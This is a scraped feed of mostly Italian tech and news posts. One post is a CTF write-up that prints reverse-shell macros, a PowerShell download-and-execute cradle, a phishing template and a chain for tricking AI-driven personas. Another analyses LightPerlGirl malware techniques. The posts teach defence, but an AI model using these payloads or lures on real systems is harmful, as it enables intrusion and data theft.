Salta al contenuto principale



Reliving VHS Memories with NFC and ESPHome


Like many of us of a certain vintage, [Dillan Stock] at The Stock Pot is nostalgic for VHS tapes. It’s not so much the fuzzy picture or the tracking issues we miss, but the physical experience the physical medium brought to movie night. To recreate that magic, [Dillan] made a Modern VHS with NFC and ESPHome.

NFC tags are contained in handsomely designed 3D printed cartridges. You can tell [Dillan] put quite a bit of thought into the industrial design of these: there’s something delightfully Atari-like about them, but they have the correct aspect ratio to hold a miniaturized movie poster as a label. They’re designed to print in two pieces (no plastic wasted on supports) and snap together without glue. The printed reader is equally well thought out, with print-in-place springs for that all important analog clunk.

Electronically, the reader is almost as simple as the cartridge: it holds the NFC reader board and an ESP32. This is very similar to NFC-based audio players we’ve featured before, but it differs in the programming. Here, the ESP32 does nothing related directly to playing media: it is simply programmed to forward the NFC tag id to ESPHome. Based on that tag ID, ESPHome can turn on the TV, cue the appropriate media from a Plex server (or elsewhere), or do… well, literally anything. It’s ESPHome; if you wanted to make this and have a cartridge to start your coffee maker, you could.

If this tickles your nostalgia bone, [Dillan] has links to all the code, 3D files and even the label templates on his site. If you’re not sold yet, check out the video below and you might just change your mind. We’ve seen hacks from The Stock Pot before, everything from a rebuilt lamp to an elegant downspout and a universal remote.

youtube.com/embed/Jhhwn7OA_xY?…


hackaday.com/2025/07/03/relivi…



Caos da Patch: un aggiornamento di Windows 11 manda in tilt la stampa PDF


Ebbene sì, ancora una volta un aggiornamento di Windows ha scatenato l’inferno. L’innocua funzione “Microsoft Print to PDF”, da anni alleata silenziosa di utenti e amministratori IT, è finita KO dopo l’aggiornamento preview di aprile 2025 su sistemi Windows 11 24H2.

Una funzionalità data per scontata, quella della stampa PDF, che improvvisamente… scompare nel nulla. Niente più stampante PDF sotto Impostazioni > Dispositivi Bluetooth e stampanti. E per chi prova a riattivarla tramite funzionalità opzionali o PowerShell? Una bella schermata con l’errore 0x800f0922. La stampante non si reinstalla e il driver non si trova.

Il fix? Solo per chi osa le patch opzionali


Microsoft ha finalmente messo una pezza al disastro con l’aggiornamento cumulativo KB5060829, rilasciato in anteprima lo scorso venerdì.
Ma attenzione: il fix è solo per i coraggiosi che installano gli update opzionali di giugno.
Per tutti gli altri, l’attesa durerà fino al Patch Tuesday di luglio.

Nel frattempo, chi non vuole aspettare dovrà tentare la riabilitazione manuale:

  • Aprire la finestra “Funzionalità facoltative” con Win + R, digitare optionalfeatures e cercare Microsoft Print to PDF.
  • Oppure usare PowerShell (con privilegi amministrativi), eseguendo:


Disable-WindowsOptionalFeature -Online -FeatureName Printing-PrintToPDFServices-FeaturesEnable-WindowsOptionalFeature -Online -FeatureName Printing-PrintToPDFServices-Features
Anche in questo caso, però, l’errore 0x800f0922 potrebbe ripresentarsi.

Non è la prima volta: quando aggiornare diventa un rischio


Questa non è che l’ennesima puntata di una lunga serie.
A marzo, altri aggiornamenti mandavano in crisi le stampanti USB, facendole sputare caratteri casuali come se fossero impazzite.
A giugno, Microsoft ha addirittura avvisato di possibili ritardi nelle patch di sicurezza a causa di metadati errati e problemi critici con Windows Update.

L’IT tra aggiornamenti e imprevisti


In un contesto in cui anche un semplice aggiornamento può nascondere qualche imprevisto, i team IT si trovano spesso a dover pianificare con attenzione ogni installazione, testando le patch prima del rilascio definitivo e monitorando eventuali anomalie.

Questa volta è toccato alla stampa PDF. La prossima? Magari un driver Bluetooth, magari nulla.
Quel che è certo è che ogni Patch Tuesday porta con sé qualche sorpresa… e un pizzico di sana prudenza non guasta mai.

L'articolo Caos da Patch: un aggiornamento di Windows 11 manda in tilt la stampa PDF proviene da il blog della sicurezza informatica.



Senza pudore!


@Giornalismo e disordine informativo
articolo21.org/2025/07/senza-p…
Spudorati! Mentre dai canali social della presidente Chiara Colosimo rimbalzano le immagini della “Borsa di Borsellino” esibita alla Camera dei Deputati, il Governo presenta emendamenti al dl INFRASTRUTTURE, oggi in conversione alla Camera dei Deputati, per annacquare la prevenzione anti mafia, precisamente ciò che il Quirinale aveva



Fuoricampo ma soprattutto controcorrente


@Notizie dall'Italia e dal mondo
Fuoricampo, ma soprattutto controcorrente. L’abbiamo immaginata così, la prossima edizione del nostro festival Fuoricampo – il festival del giornalismo lento: un piccolo seme di informazione marginale, indipendente e collettiva, nella teoria e nella pratica. Proprio come la nostra testata giornalistica: sempre in direzione ostinata e
L'articolo



Out of Distribution (OoD): cos’è e come riconoscere quando l’AI non sa


@Informatica (Italy e non Italy 😁)
Il mancato rilevamento degli input Out of Distribution (OoD) nell'AI potrebbe causare guasti silenti con conseguenze importanti. Poiché le organizzazioni continuano a incorporare l'intelligenza artificiale nei loro sistemi mission critical, il rilevamento degli



SIRIA. Suwayda, tra pietra e resistenza: viaggio in una città che non si piega (Parte 2)


@Notizie dall'Italia e dal mondo
Seconda parte del diario politico dalla "capitale" drusa dove si sperimentano forme di auto-organizzazione ribadendo il legame con il resto del popolo siriano e il rifiuto delle manovre di altri paesi
L'articolo SIRIA. Suwayda, tra



Smallest Gaming Mouse Has Crazy Fast Polling Rate And Resolution


[juskim] wanted to build a tiny mouse, but it couldn’t just be any mouse. It had to be a high-tech gaming mouse that could compete with the best on raw performance. The results are impressive, even if the final build is perhaps less than ideal for pro-level gameplay.

The build riffs on an earlier build from [juskim] that used little more than a PCB and a 3D-printed housing to make a barebones skeleton mouse. However, this one ups the sophistication level. At the heart of the build is the nRF54L15 microcontroller, which is paired with a PAW3395 mouse sensor which is commonly used in high-end gaming mice. It offers resolution up to 26K DPI for accurate tracking, speeds up to 650 ips, and 8 kHz sampling rates. Long story short, if you want fine twitch control, this is the sensor you’re looking for. The sensor and microcontroller are laced together on a custom PCB with a couple of buttons, a battery, and a charging circuit, and installed in a barebones 3D-printed housing to make the final build as small as possible.

The only real thing letting the design down is the mouse’s key feature—the size. There’s very little body to grab on to and it’s hard to imagine being able to play most fast-paced games at a high level with such a tiny device. Nevertheless, the specs are hardcore and capable, even if the enclosure isn’t.

[juskim] loves building tiny peripherals; we’ve featured his fine work before, too. Video after the break.

youtube.com/embed/XgV3BgWfUFY?…


hackaday.com/2025/07/02/smalle…



Se è gratuito, il prodotto sei tu. Google paga 314 milioni di dollari per violazione dei dati agli utenti Android


Google è al centro di un’imponente causa in California che si è conclusa con la decisione di pagare oltre 314 milioni di dollari agli utenti di smartphone Android nello stato. Una giuria di San Jose ha stabilito che l’azienda ha violato i diritti dei proprietari di dispositivi mobili raccogliendo dati dai loro telefoni senza autorizzazione, anche quando i dispositivi erano in modalità standby.

Come ha spiegato l’avvocato dei querelanti, Glen Summers, la decisione del tribunale conferma la gravità delle violazioni commesse da Google e l’equità delle accuse mosse nei suoi confronti. Secondo lui, le azioni dell’azienda hanno costretto milioni di utenti in California a consumare i propri dati mobili, mentre le informazioni raccolte venivano utilizzate a vantaggio dell’azienda stessa, per scopi pubblicitari e altri scopi commerciali.

La class action è stata intentata nel 2019 e sosteneva che Google continuasse a inviare e ricevere dati dai dispositivi Android tramite i suoi servizi anche quando gli utenti non interagivano con i telefoni. Secondo l’accusa, ciò avrebbe interessato circa 14 milioni di californiani.

Gli avvocati di Google hanno insistito sul fatto che non era stato arrecato alcun danno agli utenti. La principale argomentazione dell’azienda era che tutti questi processi erano descritti in anticipo nei termini di utilizzo e nell’informativa sulla privacy che ciascun utente accetta al momento dell’attivazione del dispositivo. Tuttavia, la giuria ha deciso diversamente, a sostegno della posizione dei ricorrenti.

Il portavoce di Google, José Castaneda, ha dichiarato che l’azienda non è d’accordo con la decisione del tribunale e intende presentare ricorso. Ha inoltre osservato che questi processi di raccolta dati sono parte integrante della garanzia della sicurezza, della stabilità e dell’affidabilità dei dispositivi Android.

Una causa simile che coinvolge utenti Android in altri 49 stati degli Stati Uniti è pendente presso il tribunale federale di San Jose. Il processo dovrebbe iniziare nell’aprile 2026. Questa situazione sta diventando l’ultimo episodio di una serie di azioni legali contro le più grandi aziende IT, sempre più accusate di gestione non etica dei dati personali.

Nel caso di Google, non si tratta solo di una questione di privacy, ma anche del fatto che le informazioni siano state raccolte a spese delle risorse degli utenti, il che ha causato ulteriore indignazione.

L'articolo Se è gratuito, il prodotto sei tu. Google paga 314 milioni di dollari per violazione dei dati agli utenti Android proviene da il blog della sicurezza informatica.

Braccio reshared this.



CTF di RHC 2025. Ingegneria sociale in gioco: scopri la quarta “flag” non risolta


La RHC Conference 2025, organizzata da Red Hot Cyber, ha rappresentato un punto di riferimento per la comunità italiana della cybersecurity, offrendo un ricco programma di talk, workshop e competizioni. Tra gli eventi più attesi, spiccano le Capture The Flag (CTF), che hanno coinvolto i partecipanti in sfide avvincenti e realistiche.

Queste CTF hanno portato i partecipanti nel cuore di una crisi geopolitica simulata: una Cyber Warfare Ibrida contro la nazione fittizia di Minzhong, in cui attori malevoli puntavano a sabotare la supply chain e le reti 4G locali. Questa simulazione, realizzata con il contributo di CyberSecurityUP, Hackmageddon e Fondazione Bruno Kessler (FBK), ha spinto i concorrenti a confrontarsi con tematiche moderne come AI, minacce ibride, disinformazione e infrastrutture critiche, alzando l’asticella del realismo tecnico e narrativo.

Una delle CTF più innovative è stata quella dedicata al Social Engineering, organizzata dalla FBK e dall’Università di Trento in collaborazione con il collettivo HackerHood, che ha offerto ai partecipanti un’esperienza immersiva e un approccio rivoluzionario per le sfide CTF, simulando un ambiente realistico gestito dall’intelligenza artificiale, che gli attaccanti potevano compromettere combinando tecniche di manipolazione psicologica con exploit tecnologici.

Una piattaforma di social engineering per una CTF realistica


La CTF sul Social Engineering si è distinta per l’uso innovativo di una piattaforma sperimentale sviluppata in ambito di ricerca. Questa piattaforma, creata da FBK e dall’Università di Trento, ha generato dinamicamente una finta infrastruttura ICT: indirizzi email, utenti fittizi, un servizio di storage cloud e identità virtuali dotate di personalità credibili, in grado di interagire in linguaggio naturale con i partecipanti.

Il cuore della competizione non era l’exploitation tecnica, ma l’inganno: convincere questi “personaggi virtuali” a rivelare informazioni sensibili, cliccare su link o scaricare allegati. Tutto questo grazie all’uso sapiente dell’ingegneria sociale, combinata con l’analisi dei dettagli dell’ambiente simulato.

Il contributo di HackerHood: test e adattamento


Il collettivo HackerHood ha avuto un ruolo essenziale nella riuscita della competizione, contribuendo non solo ad una validazione iniziale di tale piattaforma ma anche all’adattamento della stessa al contesto CTF. Dopo numerose sessioni di test, sono stati migliorati stabilità, scalabilità e credibilità dell’infrastruttura.

I partecipanti si sono trovati davanti a un ecosistema realistico e immersivo, in cui ogni azione produceva reazioni coerenti da parte degli utenti simulati, grazie a un motore di intelligenza artificiale generativa. Questo ha elevato notevolmente il livello di sfida, rendendo ogni interazione una prova di astuzia e precisione linguistica.

Le Flag della CTF: Social Engineering in azione


La CTF si è articolata in una serie di flag a difficoltà crescente, tutte basate sull’ingegneria sociale e sull’interazione con l’ambiente simulato. Ogni flag rappresentava una tappa nel percorso di compromissione dell’infrastruttura aziendale fittizia.

Panoramica delle principali flag


  • Scopri la password di un dipendente
    Obiettivo: convincere un dipendente a rivelare o lasciar trapelare la propria password.
  • Viola il ticket system aziendale
    Obiettivo: scoprire l’indirizzo email nascosto del supporto IT e sfruttarlo per un attacco.
  • Recupera il file “lista-esuberi”
    Obiettivo: ottenere un file riservato presente solo nel sistema di online file sharing.
  • Recupera una password condivisa
    Obiettivo: identificare una mail interna in cui veniva condivisa una password aziendale.
  • Scopri la chiave privata del CEO
    Obiettivo: recuperare una chiave SSH inviata via email, sfruttando altre compromissioni precedenti.


L’ultima sfida irrisolta “Leggi il contenuto del budget aziendale”


Questa flag rappresentava il punto avanzato dell’intera CTF: per ottenerla, i partecipanti dovevano recuperare e leggere un file PDF riservato chiamato budget-aziendale.pdf, presente solo sul laptop Windows del CEO. Il file era protetto da una password nota soltanto a chi avesse risolto la flag “Recupera una password condivisa” nascosta fra le conversazioni di due dipendenti.

L’obiettivo poteva essere raggiunto seguendo due percorsi alternativi, entrambi validi ma di difficoltà diversa:

1. Accesso tramite SSH:

Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre uno qualunque dei “personaggi virtuali” ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema Linux. Era quindi possibile utilizzare la chiave SSH ottenuta dal completamento della flag “Scopri la chiave privata del CEO” per accedere interattivamente e tramite movimento laterale al laptop del CEO e leggere il file localmente.

Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.

  • Recupero della chiave privata del CEO: accedere alla casella mail del CEO e recuperare la sua chiave privata inviata tramite mail. La chiave era gia’ in possesso se la flag “Scopri la chiave privata del CEO” era gia’ stata completata.
  • Estrazione della chiave privata del CEO: convincere il CEO a fornire il proprio ID, in modo da poter estrarre la chiave privata.
  • Creazione del documento malevolo: creare un documento LibreOffice contenente una macro capace di aprire una reverse shell. Un esempio di macro e’ riportato di seguito.


Function Main
shell("bash -c 'bash -i &> /dev/tcp// 0>&1'")
End Function

  • Invio del payload: inviare una mail ad uno dei dipendenti utilizzanti Linux allegando il file malevolo. Un testo di esempio di tale mail e’ riportato di seguito.


Gentile Utente,in allegato le nuove policy di sicurezza appena approvate. La invitiamo cortesemente a prenderne visione e a procedere alla loro attuazione al fine di migliorare la security posture dell'aziendaRestiamo a disposizione per ogni dubbio e chiarimento.Cordialmente,Il dipartimento IT.

  • Upload della chiave privata del CEO: caricare sul laptop del dipendente la chiave privata del CEO ottenuta in precedenza.
  • Movimento laterale: Utilizzare la shell acquisita sul laptop del dipendente per effettuare un movimento laterale, collegandosi tramite SSH al laptop del CEO mediante l’uso della chiave SSH.
  • Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
  • Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
  • Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.

2. Violazione diretta del laptop del CEO:

Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre il CEO ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema. Questa strategia era più complicata dal momento che sul portatile Windows era presente un antivirus.Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.

  • Creazione del documento malevolo: creare un documento Microsoft Office contenente una macro capace di aprire una reverse shell. In questo caso era necessario operare delle operazioni di offuscamento sulla macro, poiché il laptop del CEO era protetto da un antivirus capace di bloccare le macro malevole in chiaro. Un esempio di macro in chiaro e’ riportato di seguito.


Sub Auto_Open()
Last = "powershell -exec bypass IEX ((new-object
net.webclient).downloadstring('http:///poc.txt')) -WindowStyle Minimized"
CreateObject("Wscript.Shell").Run Last
End Sub
Il contenuto del file poc.txt per questa macro e’ riportato di seguito.

$client = New-Object System.Net.Sockets.TCPClient("",);$stream=$client.GetStrean();[byte[]]$bytes = 0..655351|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCITEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

  • Invio del payload: inviare una mail al CEO allegando il file malevolo. Un testo di esempio di tale mail e’ riportato al punto d del metodo procedente.
  • Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
  • Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
  • Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.

Entrambe le strategie richiedevano competenze trasversali, tempismo e il corretto uso delle flag ottenute in precedenza: la password del file veniva acquisita solo tramite la flag “Recupera una password condivisa”, e l’accesso al sistema era subordinato a compromissioni precedenti “Scopri la chiave privata del CEO” o “Scopri la password di un dipendente”.

Criticità e caratteristiche


  • Il file non era accessibile tramite il sistema di file sharing in cloud.
  • Era necessario ricostruire correttamente la topologia aziendale per pianificare l’accesso al dispositivo del CEO.
  • Il file conteneva la flag finale, una frase ironica che rifletteva il tema aziendale fittizio della simulazione:
    CTFRHC{{W3_H4V3_NO_M0R3_MON3Y}}


Completamento e Motivi del fallimento


Nonostante il 95% del percorso fosse stato risolto, nessun team è riuscito a ottenere questa flag e secondo una preliminare valutazione i principali motivi sono i seguenti:

  • Gestione del tempo: i partecipanti sono arrivati molto vicini alla soluzione, ma non hanno avuto il tempo sufficiente per completare la catena finale di compromissioni e accessi necessari.
  • Approccio tecnico predominante: molti team hanno preferito concentrarsi sull’identificazione e lo sfruttamento di possibili vulnerabilità tecniche dell’infrastruttura, sottovalutando la componente di social engineering, che in questo scenario era in realtà la chiave per aggirare i controlli e convincere i personaggi virtuali ad agire.
  • Complessità dell’ambiente IA: il comportamento del CEO era gestito da un’IA configurata per ignorare email da contatti esterni, rendendo inefficaci approcci diretti e costringendo i team a cercare vie interne più complesse.


Conclusioni


I commenti raccolti al termine della competizione parlano chiaro: la combinazione di una piattaforma di social engineering realistica ed interazioni dinamiche guidate da intelligenza artificiale ha offerto ai partecipanti un’esperienza nuova e fresca rispetto alle altre sfide disponibili. Tutti i partecipanti erano concordi sul fatto che questo tipo di approccio fosse una ventata d’aria fresca rispetto alle classiche sfide, costringendoli anche a cambiare mentalità e prospettiva per poterla portare a termine.

La sfida ha alzato significativamente l’asticella, non solo in termini tecnici, ma soprattutto per la capacità di simulare scenari credibili, in cui il fattore umano è al centro del gioco. In un’epoca in cui la manipolazione dell’informazione e l’ingegneria sociale sono armi reali, esperienze come questa rappresentano un passo importante verso una formazione più completa, moderna e aderente alla realtà delle minacce informatiche. La sperimentazione ha dimostrato che è possibile fare didattica e ricerca in modo innovativo, coinvolgente e ad alto impatto.

Il presente articolo e le attività descritte sono frutto di una collaborazione tra FBK, Università di Trento ed Hackerhood. Si ringraziano Manuel Roccon, Matteo Bridi, Alessandro Molinari, Domenico Siracusa, Claudio Facchinetti e Daniele Santoro.

L'articolo CTF di RHC 2025. Ingegneria sociale in gioco: scopri la quarta “flag” non risolta proviene da il blog della sicurezza informatica.



LightPerlGirl: Il Malware Invisibile che Sfugge agli Antivirus e Si Attiva con un Click


Un nuovo malware chiamato LightPerlGirl ha attirato l’attenzione degli esperti di sicurezza informatica per il suo insolito e pericoloso schema di penetrazione dei dispositivi. L’attacco si basa sulla tecnica ClickFix : una finta finestra pop-up CAPTCHA che avvia una complessa sequenza di azioni utilizzando PowerShell e metodi che consentono al codice dannoso di nascondersi completamente dalle soluzioni di sicurezza.

Il nome del malware trae ispirazione dalla riga interna del copyright: “Copyright (c) LightPerlGirl 2025“. La campagna di distribuzione del malware è stata notata per la prima volta dai ricercatori di Todyl dopo aver rilevato script PowerShell anomali su un dispositivo client. Questo è diventato il punto di partenza per indagare su un complesso schema di infezione a più fasi in grado di bypassare i meccanismi di difesa tradizionali.

L’infezione inizia visitando un sito compromesso, il più delle volte sulla piattaforma WordPress, come una risorsa di viaggio. Le pagine ospitano codice JavaScript dannoso, mascherato da controllo di sicurezza di provider noti come Cloudflare. Lo script richiama una finestra con un CAPTCHA falso che, interagendo con esso, richiede all’utente di avviarlo tramite la funzione Esegui di Windows, essenzialmente la prima fase dell’attacco.

Questo comando contatta il server C&C all’indirizzo “cmbkz8kz1000108k2carjewzf[.]info”, da cui viene scaricato il seguente script di PowerShell. Viene eseguito interamente in memoria e include tre moduli: HelpIO, Urex ed ExWpL. Ognuno di essi esegue attività specifiche volte a proteggere il malware nel sistema e a renderlo invisibile.

Il modulo HelpIO richiede i diritti amministrativi tramite la finestra UAC standard e aggiunge quindi un’eccezione a Windows Defender per la directory “C:\Windows\Temp”. Ciò consente il salvataggio dei componenti successivi senza generare allarmi nei programmi antivirus. Urex garantisce quindi una presenza persistente nel sistema scaricando un file bat chiamato “LixPay.bat” e posizionandolo nella directory Temp esclusa. Crea inoltre un collegamento all’avvio in modo che venga eseguito a ogni avvio del sistema.

L’elemento più complesso, ExWpL, non utilizza affatto il file system. Decrittografa un assembly .NET codificato in base64 e lo esegue direttamente in memoria utilizzando il metodo System.Reflection.Assembly.Load(). Questo approccio evita qualsiasi interazione con il disco, il che complica notevolmente il rilevamento.

Dopo aver completato tutte le fasi, il malware mantiene una connessione stabile con il server di comando e controllo, consentendo agli aggressori di eseguire comandi in tempo reale e di scaricare nuovi componenti senza lasciare tracce nel file system.

Secondo Todyl, il fattore critico dell’infezione è stata la mancanza di sistemi di protezione degli endpoint sul dispositivo attaccato, che ha consentito l’esecuzione dello script iniziale. Tuttavia, il team dell’azienda è riuscito a isolare l’host infetto utilizzando il proprio SIEM e l’analisi dei log degli script di PowerShell.

La chiave dell’attacco è il coinvolgimento dell’utente. Tutto inizia con un singolo clic su un CAPTCHA “sicuro” che esegue effettivamente il codice. Todyl sottolinea che nessun controllo di sicurezza dovrebbe richiedere l’inserimento manuale di comandi. Inoltre, si raccomanda di installare urgentemente strumenti di protezione completa degli endpoint e di utilizzare gli indicatori di compromissione forniti nel report per condurre un’analisi dell’infrastruttura.

LightPerlGirl è un esempio di come l’elegante ingegneria sociale e la sofisticatezza tecnica si fondano per creare una minaccia che non può essere ignorata.

L'articolo LightPerlGirl: Il Malware Invisibile che Sfugge agli Antivirus e Si Attiva con un Click proviene da il blog della sicurezza informatica.



Bastian’s Night #432 July, 3rd


Every Thursday of the week, Bastian’s Night is broadcast from 21:30 CEST (new time).

Bastian’s Night is a live talk show in German with lots of music, a weekly round-up of news from around the world, and a glimpse into the host’s crazy week in the pirate movement aka Cabinet of Curiosities.


If you want to read more about @BastianBB: –> This way


piratesonair.net/bastians-nigh…



Reservoir Sampling, or How to Sample Sets of Unknown Size


Selecting a random sample from a set is simple. But what about selecting a fair random sample from a set of unknown or indeterminate size? That’s where reservoir sampling comes in, and [Sam Rose] has a beautifully-illustrated, interactive guide to how reservoir sampling works. As far as methods go, it’s as elegant as it is simple, and particularly suited to fairly sampling dynamic datasets like sipping from a firehose of log events.

While reservoir sampling is simple in principle it’s not entirely intuitive to everyone. That’s what makes [Sam]’s interactive essay so helpful; he first articulates the problem before presenting the solution in a way that makes it almost self-evident.

[Sam] uses an imaginary deck of cards to illustrate the problem. If one is being dealt cards one at a time from a deck of unknown size (there could be ten cards, or a million), how can one choose a single card in a way that gives each an equal chance of having been selected? Without collecting them all first?

In a nutshell, the solution is to make a decision every time a new card arrives: hold onto the current card, or replace it with the new one. Each new card is given a 1/n chance of becoming held, where n is the number of cards we’ve seen so far. That’s all it takes. No matter when the dealer stops dealing, each card that has been seen will have had an equal chance of ending up the one selected.

There are a few variations which [Sam] also covers, and practical ways of applying it to log collection, so check it out for yourself.

If [Sam]’s knack for illustrating concepts in an interactive way is your jam, we have one more to point out. Our own Al Williams wrote a piece on Turing machines; the original “universal machine” being a theoretical device with a read/write head and infinite paper tape. A wonderful companion to that article is [Sam]’s piece illustrating exactly how such a Turing machines would work in an interactive way.


hackaday.com/2025/07/02/reserv…



Hack Swaps Keys for Gang Signs, Everyone Gets In


The door-unlocking mechanism, featuring a 3D printed bevel gear and NEMA 17 stepper.

How many times do you have to forget your keys before you start hacking on the problem? For [Binh], the answer was 5 in the last month, and his hack was to make a gesture-based door unlocker. Which leads to the amusing image of [Binh] in a hallway throwing gang signs until he is let in.

The system itself is fairly simple in its execution: the existing deadbolt is actuated by a NEMA 17 stepper turning a 3D printed bevel gear. It runs 50 steps to lock or unlock, apparently, then the motor turns off, so it’s power-efficient and won’t burn down [Binh]’s room.

The software is equally simple; mediapipe is an ML library that can already do finger detection and be accessed via Python. Apparently gesture recognition is fairly unreliable, so [Binh] just has it counting the number of fingers flashed right now. In this case, it’s running on a Rasberry Pi 5 with a webcam for image input. The Pi connects via USB serial to an ESP32 that is connected to the stepper driver. [Binh] had another project ready to be taken apart that had the ESP32/stepper combo ready to go so this was the quickest option. As was mounting everything with double-sided tape, but that also plays into a design constraint: it’s not [Binh]’s door.

[Binh] is staying in a Hacker Hotel, and as you might imagine, there’s been more penetration testing on this than you might get elsewhere. It turns out it’s relatively straightforward to brute force (as you might expect, given it is only counting fingers), so [Binh] is planning on implementing some kind of 2FA. Perhaps a secret knock? Of course he could use his phone, but what’s the fun in that?

Whatever the second factor is, hopefully it’s something that cannot be forgotten in the room. If this project tickles your fancy, it’s open source on GitHub, and you can check it out in action and the build process in the video embedded below.

After offering thanks to [Binh] for the tip, the remaining words of this article will be spent requesting that you, the brilliant and learned hackaday audience, provide us with additional tips.

youtube.com/embed/yNJkpo-19DI?…


hackaday.com/2025/07/02/hack-s…



l'italia, come al solido il paese delle chiacchiere. lavorate schiavi, lavorate.


Quando il populismo si insinua nelle università

@Politica interna, europea e internazionale

Scriveva Giuseppe Prezzolini che “quando sono università non sono popolari e quando sono popolari non sono università”. Sostituendo l’aggettivo popolare con l’aggettivo populista, che indica l’inclinazione ad assecondare gli umori della massa contrapponendoli agli interessi delle élite, si ottiene la fotografia



Anonimato in rete - considerazioni a quattro mani.


@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/anonimat…
Gli pseudonimi fanno parte di noi, ci servono, ci sono sempre serviti. In battaglia, i nomi scompaiono ed esistono solo gli pseudonimi. È l'unico modo per evitare le rappresaglie sulle famiglie dei combattenti. Nell'arte, gli pseudonimi sono la



Legendary First Amendment lawyers slam Paramount-Trump settlement


FOR IMMEDIATE RELEASE:

Paramount Global, which owns CBS News, has reportedly decided to settle President Donald Trump’s frivolous lawsuit over the editing of a “60 Minutes” interview with his former presidential rival Kamala Harris.

Virtually no one aside from Trump’s hangers-on believes the case had any merit, let alone $16 million worth. There was no rational reason for Paramount to settle — aside from paying for favoritism, including over its planned merger with Skydance Media.

Legendary First Amendment lawyers Floyd Abrams and James Goodale each recall a time when news outlets were owned by news companies that had both economic and principled interests in defending the First Amendment. They’re alarmed by what they’re seeing today.

“The agreement of Paramount to pay any settlement amount to Donald Trump ... is an ominous blow to press freedom in our nation.”


Floyd Abrams

Abrams, who represented The New York Times during the Pentagon Papers case and had a hand in countless other seminal First Amendment rulings, told Freedom of the Press Foundation (FPF) via email that “the agreement of Paramount to pay any settlement amount to Donald Trump based on a ‘60 Minutes’ broadcast that was both journalistically responsible and fully protected by the First Amendment is an ominous blow to press freedom in our nation.”

As Abrams noted in a letter to the Times, despite the significant challenges the Trump administration presents for media outlets, “it is not too much for the public to ask of the press that it remain vigilant in its coverage of him and militant in defense of itself.”

Goodale, the Times vice president, vice chairman, and general counsel from 1963 to 1980, led the newspaper’s resistance to the Nixon administration’s war on the press. He told FPF in an email, “It’s a sad day for journalism in the United States when the corporate owners of major news broadcasters are unwilling to fight back against baseless lawsuits by politicians.”

“It’s a sad day for journalism in the United States when the corporate owners of major news broadcasters are unwilling to fight back against baseless lawsuits by politicians.”


James Goodale

Goodale reiterated his view, which he also expressed in a prior interview with FPF, that businesspeople unwilling to safeguard reporters’ rights should choose a different industry. “Operating a news outlet is a serious responsibility and those whose other financial interests won’t allow them to stand up for the First Amendment should stay out of the news business.”

Seth Stern, FPF’s director of advocacy, added that Paramount’s settlement and other capitulations by major media outlets “put to rest the myth that billionaires and corporate conglomerates will refrain from meddling with the editorial affairs of news publishers they own. CBS and other corporate-owned news outlets are full of great journalists who deserve ownership that won’t throw them under the bus to make a buck. Americans concerned by these developments should support independent news outlets willing to stand up for their journalists’ First Amendment rights so that our free press can survive this administration.”

Please contact us if you would like further comment.


freedom.press/issues/legendary…

Gazzetta del Cadavere reshared this.



Subpixel Rendering For Impossibly Small Terminal Text


When it comes to text, how small is too small? The experts say a six point font is the minimum for readability, but as [James Bowman] shows us, you can get away with half of that.

The goal is to produce a 40-character display on a 24 mm x 24 mm LCD that has a resolution of 240 x 240 to show a serial terminal (or other data) on the “TermDriver2” USB-to-Serial adapter. With 24 lines, that’s a line per millimeter: very small text. Three points, to be precise, half what the experts say you need. Diving this up into 40 columns gives a character cell of six by nine pixels. Is it enough?

The raw font on the left, the subpixel rendering on the right. For once, it’s better if you don’t click to enlarge.
Not by itself, no. That’s where the hack comes in: sub-pixel rendering. After all, a “white” pixel on an LCD is actually three elements: a red, a green, and a blue subpixel, stacked side-by-each. Drive each of those subpixels independently and 240 pixels now becomes 720. That’s plenty for a 40 column terminal.

The article discusses how, in general terms, they pulled off the subpixel rendering and kept the font as legible as possible. We think it’s a good try, though the colored fringe around the characters can be uncomfortable to look at for some people — and then we can’t forget the physical size of the characters being 1 mm tall.

If this trick were being used on a larger display with a 240-wide resolution, we’d say “yes, very legible, good job!”– but at this size? We hope we can find our reading glasses. Still, it’s a neat trick to have in your back pocket for driving low-resolution LCDs.

It may not surprise you that aside from improving legibility, subpixel rendering is also used for pixel (er, sub-pixel) art.

The full set of glyphs in their subpixel-rendered glory.


hackaday.com/2025/07/02/subpix…



Paramount’s capitulation to Trump is a dark day for press freedom


FOR IMMEDIATE RELEASE:

Paramount Global announced late Tuesday that it will pay $16 million to settle an entirely frivolous and unconstitutional lawsuit brought by President Donald Trump over the editing of a “60 Minutes” interview with Kamala Harris.

It’s been widely reported that the settlement is intended to clear the way for federal approval of the sale of Paramount to Skydance Media, which will result in a multimillion-dollar payout to Paramount Chair Shari Redstone.

Three U.S. senators previously launched an investigation into whether paying off Trump through a settlement to obtain approval of the sale would violate federal bribery and other laws, and the California Senate opened a similar investigation.

The following statement can be attributed to Seth Stern, director of advocacy at Freedom of the Press Foundation (FPF):

Today is a dark day for press freedom. Paramount’s spineless decision to settle Trump’s baseless and patently unconstitutional lawsuit is an insult to the journalists of ‘60 Minutes’ and an invitation to Trump to continue targeting other news outlets. Each time a company cowers and surrenders to Trump’s demands it only emboldens him to do it again.

It will be remembered as one of the most shameful capitulations by the press to a president in history.

